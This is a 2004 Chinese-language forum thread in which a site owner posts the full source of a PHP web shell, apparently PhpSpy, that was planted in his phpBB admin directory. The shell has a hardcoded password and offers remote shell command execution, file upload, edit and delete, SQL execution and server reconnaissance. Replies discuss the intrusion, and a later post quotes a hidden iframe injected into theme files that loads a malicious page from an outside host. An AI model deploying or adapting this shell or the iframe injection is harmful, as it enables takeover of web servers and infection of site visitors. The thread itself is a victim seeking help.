[問題]我的論壇管理區內被植入一個怪怪的程式

文章由 **mecolor** » 2004-12-17 19:29

我的論壇管理區內被植入一個怪怪的程式
我想應該是被駭了(可能發現的早.因為16日置入今天就發現的)
有興趣的人可以去研究看看
我看不懂這是在蓋麻的(一堆表單欄位)
被植入的檔案名稱 admin_htmlsa.php
放在admin目錄底下

<?php error_reporting(7);
ob_start();
$mtime=explode(' ', microtime());
$starttime=$mtime[1]+$mtime[0];
$admin['check']="1";
$admin['checkmode']="1";
$admin['pass']="Deagle5#";
if ( function_exists('ini_get') ) {
	$onoff=ini_get('register_globals');
} else {
	$onoff=get_cfg_var('register_globals');
} if ($onoff!=1) {
	@extract($_POST, EXTR_SKIP);
	@extract($_GET, EXTR_SKIP);
} if($admin['check']=="1") {
if($admin['checkmode']=="1") {
	session_start();
	if ($_GET['action']=="logout") {
	session_destroy();
	echo "<meta http-equiv=\"refresh\" content=\"3;URL=".$_SERVER['PHP_SELF']."\">";
	echo "<span style=\"font-size: 12px; font-family: Verdana\">Suc-Out!<p><a href=\"".$_SERVER['PHP_SELF']."\">3secAutoOutOrCheckMe!></a></span>";
exit;
} if ($_POST['action']=="login") {
	$adminpass=trim($_POST['adminpass']);
	if ($adminpass==$admin['pass']) {
	$_SESSION['adminpass']=$admin['pass'];
	echo "<meta http-equiv=\"refresh\" content=\"3;URL=".$_SERVER['PHP_SELF']."\">";
	echo "<span style=\"font-size: 12px; font-family: Verdana\">Suc-In!<p><a href=\"".$_SERVER['PHP_SELF']."\">3secAutoInOrCheckme!></a></span>";
exit;
}
} if (session_is_registered('adminpass')) {
	if ($_SESSION['adminpass']!=$admin['pass']) {
	loginpage();
}
} else {
	loginpage();
}
} else {
if ($_GET['action']=="logout") {
	setcookie ("adminpass", "");
	echo "<meta http-equiv=\"refresh\" content=\"3;URL=".$_SERVER['PHP_SELF']."\">";
	echo "<span style=\"font-size: 12px; font-family: Verdana\">Suc-Out!<p><a href=\"".$_SERVER['PHP_SELF']."\">3secAutoOutOrCheckMe!></a></span>";
	exit;
} if ($_POST['action']=="login") {
	$adminpass=trim($_POST['adminpass']);
	if ($adminpass==$admin['pass']) {
	setcookie ("adminpass",$admin['pass'],time()+(1*24*3600));
	echo "<meta http-equiv=\"refresh\" content=\"3;URL=".$_SERVER['PHP_SELF']."\">";
	echo "<span style=\"font-size: 12px; font-family: Verdana\">Suc-In!<p><a href=\"".$_SERVER['PHP_SELF']."\">3secAutoInOrCheckMe!></a></span>";
exit;
} } if (isset($_COOKIE['adminpass'])) {
	if ($_COOKIE['adminpass']!=$admin['pass']) {
	loginpage();
} } else {
	loginpage();
} } } if (get_magic_quotes_gpc()) {
    $_GET=stripslashes_array($_GET);
	$_POST=stripslashes_array($_POST);
} if (!empty($downfile)) {
	if (!@file_exists($downfile)) {
	echo "<script>alert('FileNotExists!')</script>";
} else {
	$filename=basename($downfile);
	$filename_info=explode('.', $filename);
	$fileext=$filename_info[count($filename_info)-1];
	header('Content-type:application/x-'.$fileext);
	header('Content-Disposition:attachment; filename='.$filename);
	header('Content-Description:PHP3 Generated Data');
	@readfile($downfile);
exit;
} } $pathname=str_replace('\\\','/',dirname(__FILE__)); 
if (!isset($dir) or empty($dir)) {
	$dir = ".";
	$nowpath=getPath($pathname, $dir);
} else {
	$dir=$_GET['dir'];
	$nowpath=getPath($pathname, $dir);
} if (dir_writeable($nowpath)) {
	$dir_writeable = "WriteSuc!";
} else {
	$dir_writeable = "WriteFal!:(";
} $dis_func = get_cfg_var("disable_functions");
$phpinfo=(!eregi("phpinfo",$dis_func)) ? " | <a href=\"?action=phpinfo\">PhpInfO</a>":"";
$shellmode=(!get_cfg_var("safe_mode")) ? " | <a href=\"?action=shell\">ComManD</a>":"";
?><html><head><meta http-equiv=Content-Type content="text/html; charset=gb2312"><title>~Only For 1in5~</title><style type="text/css">
.maintable {
	background-color:"#FFFFFF";
	border:"1px solid #115173";
} body,td {
	font-family:"sans-serif";
	font-size:"12px";
	line-height:"150%";
} .INPUT {
	FONT-SIZE:"12px";
	COLOR:"#000000";
	BACKGROUND-COLOR:"#FFFFFF";
	height:"18px";
	border:"1px solid #666666";
} a:link,
a:visited,
a:active{
	color:"#000000";
	text-decoration:underline;
} a:hover{
	color:"#465584";
	text-decoration:none;
} .firstalt	{BACKGROUND-COLOR:"#EFEFEF"}
.secondalt	{BACKGROUND-COLOR:"#F5F5F5"}
</style></head><body style="table-layout:fixed; word-break:break-all"><center><p><strong>
<a href="?action=logout">BacK-HomE</a> | <a href="?action=dir">RooT-PatH</a> | <a href="?action=phpenv">PhP-VaR</a><?=$phpinfo?><?=$shellmode?> | <a href="?action=sql">SQL-CoN</a></strong></p>
<?php if ($_GET['action']=="phpinfo") {
	$dis_func = get_cfg_var("disable_functions");
	echo $phpinfo=(!eregi("phpinfo",$dis_func)) ? phpinfo() : "phpinfo()DisAnble;";
exit;
} ?><table width=96%><form method=GET><tr><td><p>MYPATH:<?=$pathname?><br>MOPATH:(<?=$dir_writeable?>,<?=substr(base_convert(@fileperms($nowpath),10,8),-4);?>):=:<?=$nowpath?>
<br>GOPATH:<input name=dir type=text size=44><input type=submit value=G4.></p></td></tr></form><form action="?dir=<?=urlencode($dir)?>" method=POST enctype=multipart/form-data><tr><td colspan=2>
UPPATH:<input name=uploadmyfile type=file size=44><input type=submit value=G4.><input name=action type=hidden value=uploadfile><input type=hidden name=uploaddir value="<?=$dir?>"></td>
</tr></form><form action="?action=editfile&dir=<?=urlencode($dir)?>" method=POST><tr><td colspan="2">CRPATH:<input name=newfile type=text size=44>
<input type=submit value=G4.><input name=action type=hidden value=createfile></td></tr></form><form method=POST><tr>
<td colspan=2>CFPATH:<input name=newdirectory type=text size=44><input type=submit value=G4.><input name=action type=hidden value=createdirectory></td>
</tr></form></table><hr width=96% noshade><?php echo "<p><b>
";
if(@$delfile!="") {
	if(file_exists($delfile)) {
	@unlink($delfile);
	echo "".$delfile."DELeSuc!";
} else {
	echo "NotExists,DELeFalse!:(";
} } elseif($_POST['action']=="rmdir") {
	if($deldir!="") {
	$deldirs="$dir/$deldir";
	if(!file_exists("$deldirs")) {
	echo "FolderNotexists!";
} else {
	deltree($deldirs);
} } else {
	echo "DELeFalse!:(";
} } elseif($_POST['action']=="createdirectory") {
	if(!empty($newdirectory)) {
	$mkdirs="$dir/$newdirectory";
	if(file_exists("$mkdirs")) {
	echo "FolderAlreadyHave!";
} else {
	echo $msg=@mkdir("$mkdirs",0777) ? "CreateSuc!":"False!:(";
	@chmod("$mkdirs",0777);
} } } elseif($_POST['action']=="uploadfile") {
 echo $msg=@copy($_FILES['uploadmyfile']['tmp_name'],"".$uploaddir."/".$_FILES['uploadmyfile']['name']."")?"UpSuc!":"False!";
} elseif($_POST['action']=="doeditfile") {
	$filename="$dir/$editfilename";
	@$fp=fopen("$filename","w");
	echo $msg=@fwrite($fp,$_POST['filecontent']) ? "WriteSuc!":"False!:(";
	@fclose($fp);
} elseif($_POST['action']=="editfileperm") {
	$fileperm=base_convert($_POST['fileperm'],8,10);
	echo $msg=@chmod($dir."/".$file,$fileperm) ? "AttribSuc!" : "False!:(";
	echo " [".$file."]Attrib:".substr(base_convert(@fileperms($dir."/".$file),10,8),-4)."";
} elseif($connect) {
	if (@mysql_connect($servername,$dbusername,$dbpassword) AND @mysql_select_db($dbname)) {
	echo "SQLConnSuc!";
} else {
	echo mysql_error();
} } elseif($doquery) {
	@mysql_connect($servername,$dbusername,$dbpassword) or die("ConnFalse!:(");
	@mysql_select_db($dbname) or die("ChoseDataBaseFalse!:(");
	$result=@mysql_query($_POST['sql_query']);
	if ($result) {
	echo "SQLCmdSuc!";
}else{
	echo "False!:(".mysql_error();
} mysql_close();
} elseif($_POST['action']=="viewphpvar") {
	echo "Config:".$_POST['phpvarname']."Result:".getphpcfg($_POST['phpvarname'])."";
} else {
	echo "<font color=red>B.P ~For True Love~</font>";
} echo "</b></p>
";
if (!isset($_GET['action']) OR empty($_GET['action']) OR ($_GET['action']=="dir")) {
?><table width=96% cellpadding=3 cellspacing=1 bgcolor=#ffffff><tr bgcolor=#cccccc><td align=center nowrap width=40%><b>Name:</b></td>
<td align=center nowrap width=20%><b>Date:</b></td><td align=center nowrap width=12%><b>Size:</b></td>
<td align=center nowrap width=8%><b>Attr:</b></td><td align=center nowrap width=20%><b>Edit?</b></td></tr><?php $dirs=@opendir($dir);
while ($file=@readdir($dirs)) {
	$b="$dir/$file";
	$a=@is_dir($b);
	if($a=="1"){
	if($file!=".."&&$file!=".")	{
	$lastsave=@date("Y-n-d H:i:s",filemtime("$dir/$file"));
	$dirperm=substr(base_convert(fileperms("$dir/$file"),10,8),-4);
	echo "<tr class=".getrowbg().">
";
	echo "<td style=\"padding-left: 5px;\">[<a href=\"?dir=".urlencode($dir)."/".urlencode($file)."\"><font color=\"#006699\">$file</font></a>]</td>
";
	echo "<td align=\"center\" nowrap valign=\"top\">$lastsave</td>
";
	echo "<td align=\"center\" nowrap valign=\"top\"><dir></td>
";
\n	echo "<td align=\"center\" nowrap valign=\"top\"><a href=\"?action=fileperm&dir=".urlencode($dir)."&file=".urlencode($file)."\">$dirperm</a></td>
";
	echo "<td align=\"center\" nowrap valign=\"top\"><a href=\"?action=deldir&dir=".urlencode($dir)."&deldir=".urlencode($file)."\">DELe</a></td>
";
	echo "</tr>
";
} else {
	if($file=="..") {
	echo "<tr class=".getrowbg().">
";
	echo "  <td nowrap colspan=\"5\" style=\"padding-left: 5px;\"><a href=\"?dir=".$dir."/".$file."\">UpPath</a></td>
";
	echo "</tr>
";
} } $dir_i++;
} } @closedir($dirs); 
$dirs=@opendir($dir);
while ($file=@readdir($dirs)) {
	$b="$dir/$file";
	$a=@is_dir($b);
	if($a=="0"){
	$size=@filesize("$dir/$file");
	$size=$size/1024 ;
	$size=@number_format($size, 3);    
	$lastsave=@date("Y-n-d H:i:s",filectime("$dir/$file"));
	@$fileperm=substr(base_convert(fileperms("$dir/$file"),10,8),-4);
	echo "<tr class=".getrowbg().">
";
	echo "<td style=\"padding-left: 5px;\"><a href=\"$dir/$file\" target=\"_blank\">$file</a></td>
";
	echo "<td align=\"center\" nowrap valign=\"top\">$lastsave</td>
";
	echo "<td align=\"center\" nowrap valign=\"top\">$size KB</td>
";
	echo "<td align=\"center\" nowrap valign=\"top\"><a href=\"?action=fileperm&dir=".urlencode($dir)."&file=".urlencode($file)."\">$fileperm</a></td>
";
	echo "<td align=\"center\" nowrap valign=\"top\"><a href=\"?downfile=".urlencode($dir)."/".urlencode($file)."\">DowN</a> | <a href=\"?action=editfile&dir=".urlencode($dir)."&editfile=".urlencode($file)."\">EDIT</a> | <a href=\"?dir=".urlencode($dir)."&delfile=".urlencode($dir)."/".urlencode($file)."\">DELe</a></td>
";
	echo "</tr>
";
	$file_i++;
} } @closedir($dirs); 
echo "<tr class=".getrowbg().">
";
echo "<td nowrap colspan=\"5\" align=\"right\">".$dir_i."Folders<br>".$file_i."Files</td>
";
echo "</tr>
";
?></table><?php
} elseif ($_GET['action']=="editfile") {
	if($newfile=="") {
	$filename="$dir/$editfile";
	$fp=@fopen($filename,"r");
	$contents=@fread($fp, filesize($filename));
	@fclose($fp);
	$contents=htmlspecialchars($contents);
}else{
	$editfile=$newfile;
	$filename="$dir/$editfile";
} ?><table width=96% cellpadding=3 cellspacing=1 bgcolor=#ffffff><tr class=firstalt>
<td align=center>New/EditFile[<a href="?dir=<?=urlencode($dir)?>">BACK</a>]</td></tr><form action="?dir=<?=urlencode($dir)?>" method=POST><tr class=secondalt>
<td align="center">NowFile:<input type=text name=editfilename size=30 value="<?=$editfile?>">NewFileName:</td></tr><tr class=firstalt>
<td align=center><textarea name=filecontent cols=100 rows=20><?=$contents?></textarea></td></tr><tr class=secondalt>
<td align=center><input type=submit value=G4..><input name=action type=hidden value=doeditfile><input type=reset value=ReSet></td></tr></form></table><?php
} elseif ($_GET['action']=="shell") {
	if (!get_cfg_var("safe_mode")) {
?><table width=96% cellpadding=3 cellspacing=1 bgcolor=#ffffff><tr class="firstalt"><td align=center>ComManD</td></tr>
<form action="?action=shell&dir=<?=urlencode($dir)?>" method=POST><tr class=secondalt><td align=center>IfOutNotComplit-CanWriteToFile</td>
</tr><tr class=firstalt><td align=center>Function:<select name=execfunc><option value=system <? if ($execfunc=="system") { echo "selected"; } ?>>system</option>
<option value=passthru <? if ($execfunc=="passthru") { echo "selected"; } ?>>passthru</option>
<option value=exec <? if ($execfunc=="exec") { echo "selected"; } ?>>exec</option>
<option value=shell_exec <? if ($execfunc=="shell_exec") { echo "selected"; } ?>>shell_exec</option>
<option value=popen <? if ($execfunc=="popen") { echo "selected"; } ?>>popen</option></select>InPut:<input type=text name=command size=66 value="<?=$_POST['command']?>">
<input type=submit value=G4.></td></tr><tr class=secondalt><td align=center><textarea name=textarea cols=100 rows=21 readonly><?php
	if (!empty($_POST['command'])) {
	if ($execfunc=="system") {
	system($_POST['command']);
} elseif ($execfunc=="passthru") {
	passthru($_POST['command']);
} elseif ($execfunc=="exec") {
	$result=exec($_POST['command']);
	echo $result;
} elseif ($execfunc=="shell_exec") {
	$result=shell_exec($_POST['command']);
	echo $result;	
} elseif ($execfunc=="popen") {
	$pp=popen($_POST['command'], 'r');
	$read=fread($pp, 2096);
	echo $read;
	pclose($pp);
} else {
	system($_POST['command']);
} } ?></textarea></td></tr></form></table><?php
} else {
?><p><b>Safe_Mode is ON Can Execute!</b></p><?php
}
} elseif ($_GET['action']=="deldir") {
?><table width=96%0 cellpadding=3 cellspacing=1 bgcolor=#ffffff><form action="?dir=<?=urlencode($dir)?>" method=POST><tr class=firstalt>
<td align=center>DELe<input name=deldir type=text value="<?=$deldir?>" readonly>Folder</td></tr><tr class=secondalt>
<td align=center>It's Will Del All.Are You Sure!</td></tr><tr class=firstalt><td align=center><input name=action type=hidden value=Rmdir>
<input type=submit value=DELe></td></tr></form></table><?php
\n} elseif ($_GET['action']=="fileperm") {
?><table width=96% cellpadding=3 cellspacing=1 bgcolor=#ffffff><tr class=firstalt><td align=center>ChangeAttrib[<a href="?dir=<?=urlencode($dir)?>">BACK</a>]</td>
</tr><form action="?dir=<?=urlencode($dir)?>" method=POST><tr class=secondalt><td align=center><input name=file type=text value="<?=$file?>" readonly>AttribIs:
<input type=text name=fileperm size=20 value="<?=substr(base_convert(fileperms($dir."/".$file),10,8),-4)?>">
<input name=dir type=hidden value="<?=urlencode($dir)?>"><input name=action type=hidden value=editfileperm><input type=submit value=modify></td></tr></form></table><?php
} elseif ($_GET['action']=="sql") {
	$servername=isset($servername) ? $servername:'127.0.0.1';
	$dbusername=isset($dbusername) ? $dbusername:'root';
	$dbpassword=isset($dbpassword) ? $dbpassword:'';
	$dbname=isset($dbname) ? $dbname:'';
?><table width=96% cellpadding=3 cellspacing=1 bgcolor=#ffffff><tr class=firstalt><td align=center>RunSQLcmD</td></tr>
<form action="?action=sql" method=POST><tr class=secondalt><td align=center>Host:
<input name=servername type=text value="<?=$servername?>">User:<input name=dbusername type=text size=15 value="<?=$dbusername?>">
Pass:<input name=dbpassword type=text size=15 value="<?=$dbpassword?>">DB:<input name=dbname type=text size=15 value="<?=$dbname?>">
<input name=connect type=submit value=Conn></td></tr><tr class=firstalt><td align=center><textarea name=sql_query cols=100 rows=10></textarea></td>
</tr><tr class=secondalt><td align=center><input type=submit name=doquery value=G4..></td></tr></form></table><?php
} elseif ($_GET['action']=="phpenv") {
	$upsize=get_cfg_var("file_uploads") ? get_cfg_var("upload_max_filesize") : "UpNotAllow!";
	$adminmail=(isset($_SERVER["SERVER_ADMIN"])) ? "<a href=\"mailto:".$_SERVER["SERVER_ADMIN"]."\">".$_SERVER["SERVER_ADMIN"]."</a>" : "<a href=\"mailto:".get_cfg_var("sendmail_from")."\">".get_cfg_var("sendmail_from")."</a>";
	$dis_func=get_cfg_var("disable_functions");
	if ($dis_func=="") {
	$dis_func="No";
}else {
	$dis_func=str_replace(" ","<br>",$dis_func);
	$dis_func=str_replace(",","<br>",$dis_func);
} $phpinfo=(!eregi("phpinfo",$dis_func)) ? "Yes" : "No";
	$info[0]=array("SerTime",date("Y-Nian-m-Yue-d-Ri h:i:s",time()));
	$info[1]=array("SerDNSName","<a href=\"http://$_SERVER[SERVER_NAME]\" target=\"_blank\">$_SERVER[SERVER_NAME]</a>");
	$info[2]=array("SerIP",gethostbyname($_SERVER["SERVER_NAME"]));
	$info[3]=array("SerOS",PHP_OS);
	$info[5]=array("SerLanguage",$_SERVER["HTTP_ACCEPT_LANGUAGE"]);
	$info[6]=array("SerEngneer",$_SERVER["SERVER_SOFTWARE"]);
	$info[7]=array("WebPort",$_SERVER["SERVER_PORT"]);
	$info[8]=array("PHPRunWay",strtoupper(php_sapi_name()));
	$info[9]=array("PHPVer",PHP_VERSION);
	$info[10]=array("SafeModle",getphpcfg("safemode"));
	$info[11]=array("SerAdmin",$adminmail);
	$info[12]=array("MyPath",__FILE__);
	$info[13]=array("Allow_url_fopen",getphpcfg("allow_url_fopen"));
	$info[14]=array("Enable_Dll_Add",getphpcfg("enable_dl"));
	$info[15]=array("Display_Errors",getphpcfg("display_errors"));
	$info[16]=array("Auto_Register_Globals_Var",getphpcfg("register_globals"));
	$info[17]=array("Magic_Quotes_Gpc",getphpcfg("magic_quotes_gpc"));
	$info[18]=array("Memory_Limit_Max",getphpcfg("memory_limit"));
	$info[19]=array("Post_Max_Size",getphpcfg("post_max_size"));
	$info[20]=array("Upload_Max_FileSize",$upsize);
	$info[21]=array("Max_Execution_Time",getphpcfg("max_execution_time")."Sec");
	$info[22]=array("Disable_Functions",$dis_func);
	$info[23]=array("phpinfo()",$phpinfo);
	$info[24]=array("DiskFreeSpace",intval(diskfreespace(".") / (1024 * 1024)).'Mb');
	$info[25]=array("Images_GD_Library",getfun("imageline"));
	$info[26]=array("IMAPMailSystem",getfun("imap_close"));
	$info[27]=array("MySQL",getfun("mysql_close"));
	$info[28]=array("SyBase",getfun("sybase_close"));
	$info[29]=array("Oracle",getfun("ora_close"));
	$info[30]=array("Oracle8 ",getfun("OCILogOff"));
	$info[31]=array("PREL-YuFa-PCRE",getfun("preg_match"));
	$info[32]=array("PDFSuport",getfun("pdf_close"));
	$info[33]=array("PostgreSQL",getfun("pg_close"));
	$info[34]=array("SNMP",getfun("snmpget"));
	$info[35]=array("ZipSuport(Zlib)",getfun("gzclose"));
	$info[36]=array("XMLSuport",getfun("xml_set_object"));
	$info[37]=array("FTP",getfun("ftp_login"));
	$info[38]=array("ODBCConn",getfun("odbc_close"));
	$info[39]=array("SessionSuport",getfun("session_start"));
	$info[40]=array("SocketSuport",getfun("fsockopen"));
?><table width=96% align=center cellpadding=3 cellspacing=1 bgcolor=#ffffff><form action="?action=phpenv" method=POST><tr class=firstalt>
<td style="padding-left: 5px;"><b>PHPConfig</b></td></tr><tr class=secondalt>
<td style="padding-left: 5px;">InPut:(Like:magic_quotes_gpc):<input name=phpvarname type=text size=40><input type=submit value=G4.><input name=action type=hidden value=viewphpvar></td>
</tr></form><?php
	for($a=0;$a<3;$a++){
	if($a==0){
	$hp=array("server","SerTeXing");
}elseif($a==1){
	$hp=array("php","PHPBaseTeXing");
}elseif($a==2){
	$hp=array("basic","ObjSuport");
} ?><tr class=firstalt><td style="padding-left: 5px;"><b><?=$hp[1]?></b></td>
</tr><tr class="secondalt"><td><table width=100%><? if($a==0){
	for($i=0;$i<=12;$i++){
	echo "<tr><td width=40% style=\"padding-left: 5px;\">".$info[$i][0]."</td><td>".$info[$i][1]."</td></tr>
";
} }elseif($a==1){
	for($i=13;$i<=24;$i++){
	echo "<tr><td width=40% style=\"padding-left: 5px;\">".$info[$i][0]."</td><td>".$info[$i][1]."</td></tr>
";
} }elseif($a==2){
	for($i=25;$i<=40;$i++){
	echo "<tr><td width=40% style=\"padding-left: 5px;\">".$info[$i][0]."</td><td>".$info[$i][1]."</td></tr>
";
} } ?></table></td></tr><?
} echo "</table>";
} ?><hr width=96% noshade><table width=96%><tr><td align=right><?php debuginfo();
	ob_end_flush();	
	?></td></tr></table></center></body></html><?php function loginpage() {
?><style type="text/css">
	input {
	font-family:"Verdana";
	font-size:"11px";
	BACKGROUND-COLOR:"#FFFFFF";
	height:"18px";
	border:"1px solid #666666";
} </style><form method=POST><span style="font-size: 11px; font-family: Verdana">In-Put:</span>
<input name=adminpass type=password size=20><input type=hidden name=action value=login><input type=submit value=G4..></form><?php
exit;
} function debuginfo() {
	global $starttime;
	$mtime=explode(' ', microtime());
	$totaltime=number_format(($mtime[1] + $mtime[0] - $starttime), 6);
	echo "Processed in $totaltime second(s)";
} function stripslashes_array(&$array) {
	while(list($key,$var) = each($array)) {
	if ($key !='argc' && $key !='argv' && (strtoupper($key) !=$key || ''.intval($key)=="$key")) {
	if (is_string($var)) {
	$array[$key]=stripslashes($var);
} if (is_array($var))  {
	$array[$key]=stripslashes_array($var);
} } } return $array;
} function deltree($deldir) {
	$mydir=@dir($deldir);	
	while($file=$mydir->read())	{ 		
	if((is_dir("$deldir/$file")) AND ($file!=".") AND ($file!="..")) { 
	@chmod("$deldir/$file",0777);
	deltree("$deldir/$file"); 
} if (is_file("$deldir/$file")) {
	@chmod("$deldir/$file",0777);
	@unlink("$deldir/$file");
} } $mydir->close(); 
	@chmod("$deldir",0777);
	echo @rmdir($deldir) ? "<b>DELeSuc!</b>":"<font color=\"#ff0000\">False!:(</font>";	
} function dir_writeable($dir) {
	if (!is_dir($dir)) {
	@mkdir($dir, 0777);
} if(is_dir($dir)) {
	if ($fp=@fopen("$dir/test.txt", 'w')) {
	@fclose($fp);
	@unlink("$dir/test.txt");
	$writeable=1;
} else {
	$writeable=0;
} } return $writeable;
} function getrowbg() {
	global $bgcounter;
	if ($bgcounter++%2==0) {
	return "firstalt";
} else {
	return "secondalt";
} } function getPath($mainpath, $relativepath) {
	global $dir;
	$mainpath_info=explode('/', $mainpath);
	$relativepath_info=explode('/', $relativepath);
	$relativepath_info_count=count($relativepath_info);
	for ($i=0; $i<$relativepath_info_count; $i++) {
	if ($relativepath_info[$i]=='.' || $relativepath_info[$i]=='') continue;
	if ($relativepath_info[$i]=='..') {
	$mainpath_info_count=count($mainpath_info);
	unset($mainpath_info[$mainpath_info_count-1]);
	continue;
} $mainpath_info[count($mainpath_info)]=$relativepath_info[$i];
} return implode('/', $mainpath_info);
} function getphpcfg($varname) {
	switch($result=get_cfg_var($varname)) {
	case 0:
	return No;
	break;
	case 1:
	return Yes;
	break;
	default:
	return $result;
	break;
} } function getfun($funName) {
	return (false !== function_exists($funName)) ? Yes:No; } ?>

文章由 **mecolor** » 2004-12-17 19:40

卡好

~剛剛又發現兩個一樣的程式
而且這兩個還簡體中文的哩...

php.php
data.php

程式碼都是一模一樣\r
只是中文簡體版而已\r
越來越討厭大陸人了.....

文章由 **mecolor** » 2004-12-17 19:50

文章由 **warkinger** » 2004-12-17 19:51

想請問你一下，值入不是要上傳嗎，上傳不是都要有密碼才行

你是用自已電腦架的，還是網路空間呢~~~~

文章由 **mecolor** » 2004-12-17 19:57

warkinger 寫:想請問你一下，值入不是要上傳嗎，上傳不是都要有密碼才行

你是用自已電腦架的，還是網路空間呢~~~~

我是自己架站的
至於他是怎樣傳上來的我也不知道...不知道哪邊又有漏洞了...
我的架設環境
●架設主機作業系統：Win 2000 Server
●Apache 1.3.29 ● PHP 4.3.4 ●MySQL 4.0.16●Zend Optimizer 2.1.0b●phpMyAdmin 2.5.4

駭客不一定要密碼\r
只要有漏洞
高手程式寫一寫\r
就可以近來了....

文章由 **[ffs]hunej** » 2004-12-17 20:42

http://www.4ngel.net/project/phpspy.htm
is this?

文章由 **[ffs]hunej** » 2004-12-17 20:44

用不著討厭吧\r
他沒有DROP你的資料庫就算很好了
我想...他們攻擊網站...也是出於好意吧(？！)
用意也是在提醒你的系統不安全\r
反正...Micro$hit的漏洞一堆，換成Linux，他們應該不會再來了吧

文章由 **webspirit** » 2004-12-17 21:09

哪位朋友能解釋一下 PhpSpy 這程式是幹嘛的？
雖該網頁是中文的，但還是看得一頭霧

文章由 **[ffs]hunej** » 2004-12-17 21:36

好像是hack工具\r

看看這個功能\r
支持MySQL语句执行

天阿(DROP ALL TABLE......)

文章由 **webspirit** » 2004-12-17 21:50

但看其說明似是管理工具　@.@

文章由 **mecolor** » 2004-12-18 00:42

[ffs]hunej 寫:用不著討厭吧\r
他沒有DROP你的資料庫就算很好了
我想...他們攻擊網站...也是出於好意吧(？！)
用意也是在提醒你的系統不安全\r
反正...Micro$hit的漏洞一堆，換成Linux，他們應該不會再來了吧

雖然沒遭到破壞
但是心理總是毛毛的
我也是很好奇到底是怎入侵的

不過Micro$hit的漏洞一堆
只能說樹大招風吧~
Linux也不是有漏洞

世界上沒有100%安全的系統
只能靠勤勞的維護與監控.備份來彌補了

之前最慘~首頁老是被換掉.不然就是整個網站被砍掉...

http://bbs.mecolor.idv.tw/phpbb2/viewto ... highlight=

文章由 **brentsu** » 2004-12-18 15:21

請問你的【http://bbs.mecolor.idv.tw/phpbb2/】在 ADSL 之後有裝任何的【硬體防火牆】嗎？

如果有.... 是怎樣的防火牆呢？該不會是 Cisco PIX 吧？

文章由 **mecolor** » 2004-12-18 17:46

brentsu 寫:請問你的【http://bbs.mecolor.idv.tw/phpbb2/】在 ADSL 之後有裝任何的【硬體防火牆】嗎？

如果有.... 是怎樣的防火牆呢？該不會是 Cisco PIX 吧？

ㄏㄏ完全沒有裝~~
Cisco PIX <==名排粉貴哩....

文章由 **brentsu** » 2004-12-19 01:12

●架設主機作業系統：Win 2000 Server

那就難怪啦.... Win2000 連內建的軟體防火牆都沒有，改用 Win2003 會好多了！

文章由 **mecolor** » 2004-12-19 01:40

剛剛還在phpbb2佈景目錄
找到一段被植入的程式碼\r

代碼: 選擇全部

<iframe src="http://www.54cq.com/bbs/uploadface/Set.htm" width="0" height="0" frameborder="0"></iframe>

版型的檔案被植入這段程式碼
那個網站看起來似乎是替死鬼
Set.htm這個檔案就是Bloodhound.Exploit.6病毒
看來是針對phpbb而來的